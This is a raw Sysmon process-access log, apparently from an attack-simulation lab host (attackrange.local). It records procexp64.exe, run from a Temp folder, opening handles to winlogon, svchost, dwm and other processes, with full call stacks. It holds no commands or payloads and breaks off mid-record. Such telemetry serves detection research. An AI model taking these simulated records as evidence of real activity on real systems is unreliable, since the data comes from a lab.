Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790329Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790328Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790327Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790326Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790325Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790324Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790323Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790322Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790321Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790320Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790319Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790318Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790317Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790316Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790315Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790314Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790313Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+8